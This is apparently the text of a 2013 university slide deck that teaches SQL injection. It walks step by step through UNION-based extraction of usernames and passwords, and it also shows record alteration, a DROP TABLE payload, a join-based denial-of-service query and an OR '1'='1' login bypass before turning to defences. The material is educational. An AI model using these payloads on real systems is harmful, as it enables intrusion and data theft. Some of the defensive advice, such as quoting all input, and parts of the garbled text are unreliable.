1. Security Lab, University Putra Malaysia
23 May 2013
Sina Manavi
Contact:http
://sinamanavi.blogspot.com/p/about-me.html
2. • Introduction
• Why SQL Injection
• What is needed for this
• What you can do with SQL Injection
• What are its pros and cons
• Why we need to know and how we can prevent our
database from SQL injection attacks
3. We are all familiar with SQL Language
One of the technology that helped in converting the static
web to dynamic one
SQL is relatively easy to read, a little more difficult to write
Works on Servers such as Apache, MS Server, etc.
SQL Injection means manipulate SQL tables with
unauthorized access
4.
5. SQL Injection may happen only two form of UI
based or URL based
◦ (1) Injecting into a form. Such as username and
password boxes on a login page.
◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php?
pid=10
6. Simple example:
Select ID from tbl_users
◦ Where ID=“Uid” and pass=“pass”
◦ If it returns any value means that the current inputs are correct
8. The "INFORMATION_SCHEMA" holds the names
of every table and column on a site, its name will
never change.
◦ Tables holding all the tables name:
"INFORMATION_SCHEMA.TABLES.“
◦ Tables holding all the Column name:
"INFORMATION_SCHEMA.COLUMNS.“
9. Finding the URL quantity:
◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1--
Increase the 1 , until you got error, then the last number is the column
number
Finding Table name
◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
And it shows:
tbl_user
To Be continued
10. Now its time to find out the Column names:
www.yourtarget.com/list.php? ID =
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+
WHERE+table_name=‘tbl_user'--
The result would be as following :
id,username,password
Column names finding step:
www.yourtarget.com/list.php? ID =
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS
+WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'—
Try the columns name until you find your target (e.g username,password, or login)
11. And Finally its time to see the records:
◦ www.yourtarget.com/list.php? =-
1+UNION+SELECT+1,username,3+FROM+UserAccounts—
And
◦ www.yourtarget.com/list.php? =-
1+UNION+SELECT+1,password,3+FROM+UserAccounts—
◦ Username=admin password=123456
◦ Stupid admin ha ;)
12. Now we can Alter the records as well, lets rock
UPDATE tbl_user
SET password = SHA2('$password')
WHERE id = $id
Or we can Insert a new user with Insert Command
13. If user_list contains 1000 records then, the database is
fired up
SELECT * FROM user_list JOIN user_list
JOIN user_list JOIN user_list JOIN user_list
JOIN user_list
14. Insert newuser into tbl_user
The maliciouse code can be :
DROP table tbl_user
15. How it works
Select * from tbl_users
Where id=“Fname” and pass=“pass”
Malicious Code:
SELECT * FROM table WHERE id= ‘Fname' or '1'='1';
if(mysql_num_rows($result))
//do login
Now the unauthorized user get accessed easily and
bypassed the authorization
16. Security is the developer’s job
No database, connector, or framework
can prevent SQL injection all the time
17. • Implement proper Error Handling. This would include
using a single error message for all errors.
• Lock down User Database configuration, Specify users,
roles and permissions etc.
• prefix and append a quote to all user input, even if the
data is numeric .
19. Vipin Samar, Oracle vice president of Database
Security:
“Database Firewall is a good first layer of
defense for databases but it won't protect you from
everything,”
20. Using Stroprocedures:
CREATE PROCEDURE SP_show_user(IN U_ID)
BEGIN
SELECT * FROM Bugs WHERE User_ID= U_ID;
END
CALL SP_show_user (54)
“Might be helpful but still vulnerable”
21. I don’t have to worry anymore
Escaping is the fixthe fix
More escaping is better
I can code an escaping function
Only user input is unsafe
Stored procs are the fixthe fix
SQL privileges are the fixthe fix
My app doesn’t need security
Frameworks are the fixthe fix
Parameters quote for you
Parameters are the fixthe fix
Parameters make queries slow
SQL proxies are the fixthe fix
NoSQL databases are the fixthe fix